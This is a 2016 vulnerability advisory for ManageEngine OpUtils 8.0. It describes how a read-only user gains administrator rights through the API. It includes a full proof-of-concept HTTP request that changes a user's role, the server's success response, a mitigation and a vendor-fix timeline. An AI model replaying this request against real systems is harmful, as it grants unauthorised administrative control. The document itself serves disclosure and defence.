Manage Engine OPutils 8.0 Privilege Escalation

`==================================================  
Privilege escalation Vulnerability in ManageEngine oputils  
==================================================  
  
. contents:: Table Of Content  
  
Overview  
========  
  
Title:- Privilege escalation Vulnerability in ManageEngine oputils  
Author: Kaustubh G. Padwad  
Vendor: ZOHO Corp  
Product: ManageEngine oputils  
Tested Version: : oputils 8.0  
Severity: HIGH  
  
Advisory ID  
============  
2016-05-Manage_Engine  
  
  
About the Product:  
==================  
OpUtils is a Switch Port & IP Address Management software that helps network engineers manage their Switches and IP Address Space with ease. With its comprehensive set of 30+ tools, it helps them to perform network monitoring tasks like detecting a rogue device intrusion, keep a check on bandwidth usage, monitoring availability of critical devices, backing up Cisco configuration files and more.  
  
  
Description:   
============  
  
This Privilege escalation vulnerability enables an Normal user to escalate privilege and become administrator of the application.   
  
Vulnerability Class:  
====================  
Top 10 2014-I2 Insufficient Authentication/Authorization https://www.owasp.org/index.php/Top_10_2014-I2_Insufficient_Authentication/Authorization  
  
  
How to Reproduce: (POC):  
========================  
  
* you should have Read only user on OpUtils   
  
* login with that account to get api key something like 375e0fa0-0bb3-479c-a646-debb90a1f5f0  
  
* Setup Burp and use change user password request and change userName to admin and newPwd to desire password HUrry you are admin now. :)  
  
POC  
====  
  
Burp Requst   
-----------  
POST /oputilsapi/admin?key=375e0fa0-0bb3-479c-a646-debb90a1f5f0 HTTP/1.1  
  
Host: 192.168.1.10:7080  
  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0  
  
Accept: application/json, text/javascript, */*; q=0.01  
  
Accept-Language: en-US,en;q=0.5  
  
Accept-Encoding: gzip, deflate  
  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
  
X-Requested-With: XMLHttpRequest  
  
Referer: http://192.168.1.10:7080/apiclient/ember/index.jsp  
  
Content-Length: 151  
  
Cookie: OPUTILSJSESSIONID=AC6E9B2C01FDDD5E27C245BC6F31C032; JSESSIONID=B59D8FD4B17DB7200A991299F4034DF1; OPUTILSJSESSIONIDSSO=1F8857A875EB16418DD7889DB60CFB66  
  
Connection: keep-alive  
  
Pragma: no-cache  
  
Cache-Control: no-cache  
  
  
  
v=1&format=json&operation=DELETE_OR_MODIFY_USER&action1=MODIFY_USER&userInAction=kk&userRole=Administrator&userAuthType=Local&contactinfoID=2&loginID=2  
  
  
  
  
Response  
--------  
HTTP/1.1 200 OK  
  
Server: Apache-Coyote/1.1  
  
Set-Cookie: OPUTILSJSESSIONIDSSO=1F8857A875EB16418DD7889DB60CFB66; Expires=Thu, 01-Jan-1970 00:00:10 GMT  
  
Set-Cookie: OPUTILSJSESSIONID=184C572A3D2E17EEC3B78C027B925421; Path=/  
  
Content-Type: application/json;charset=UTF-8  
  
Content-Length: 90  
  
Date: Thu, 04 Feb 2016 13:27:09 GMT  
  
  
  
{"input":"{newUserName=MODIFY_USER, userInAction=kk, domainName=null}","status":"Success"}  
  
  
  
  
  
Mitigation  
==========  
Upgrade to next Service pack  
  
Disclosure:   
===========  
04-Feb-2016 Repoerted to vendor  
11-Feb-2016 Fixed By vendor  
  
credits:  
========  
* Kaustubh Padwad  
* Information Security Researcher  
* [email protected]  
* https://twitter.com/s3curityb3ast  
* http://breakthesec.com  
* https://www.linkedin.com/in/kaustubhpadwad  
`